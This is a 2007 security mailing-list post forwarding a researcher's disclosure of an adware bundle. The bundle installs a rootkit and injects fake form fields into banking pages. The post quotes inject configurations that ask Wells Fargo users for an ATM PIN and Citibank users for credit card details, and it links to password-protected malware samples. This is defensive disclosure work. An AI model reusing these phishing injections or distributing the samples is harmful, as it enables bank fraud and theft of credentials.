[funsec] [Fwd: Iframe-Cash/Iframe-Dollars Adware bundle...oooh...
my ....god..]
rms at computerbytesman.com
rms at computerbytesman.com
Tue Mar 13 11:58:46 CDT 2007
Perhaps Web browsers shouldn't allow external DOM access to https Web
pages....
Richard
---------------------------- Original Message ----------------------------
Subject: Iframe-Cash/Iframe-Dollars Adware bundle...oooh... my ....god..
From: "Thierry Zoller" <Thierry at Zoller.lu>
Date: Sun, March 11, 2007 1:30 pm
To: bugtraq at securityfocus.com
--------------------------------------------------------------------------
Dear list,
Whoever deals with these poeple and thinks they are a benign Adware
company (and thus spreads their bundles.
Check this :
Ignoring the fact that they basicaly install a Rootkit, I attached a
few files I reversed, they install a DLL that does not directly KEYLOG your
banking data, but INJECTS HTML CODE into the _genuine_ (SSLed) Banking page
asking you to enter more details (like PIN, Magic Password etc), then
capture that data and transmit it (I did no further investigation)
http://secdev.zoller.lu/system32.zip
Pass: 123
I am disgusted. They even created their own XML parser for this ...
An extract of HTML code they inject :
-------------------------------------
<inject
url="wellsfargo"
before="name=userid autocomplete='off'></DIV>"
what="
<DIV><LABEL for=userid>ATM PIN</LABEL>:<BR><SPAN class='mozcloak'><INPUT
id=pin tabIndex=2 maxLength=4 type=password size=4 name=pin
autocomplete='off'></SPAN></DIV>
"
block="alt=Go"
check="pin"
quan="4"
content="d"
>
</inject>
------------------------------------
Attached the main files (pass 123), feel free to add this as HIPS or whatever
signatures, those interested in a complete reversal can contact me
to receive the EXE in question.
I have no more time feel free to dig deeper.
I especialy liked this :
------------------------
<inject
url="citibank.com"
<TR><TD colspan=3 class=smallArial noWrap><SPAN STYLE='color:red'>To
prevent fraud enter your credit card information please:</SPAN></TD></TR>
Puke..
--
http://secdev.zoller.lu
Thierry Zoller
More information about the funsec
mailing list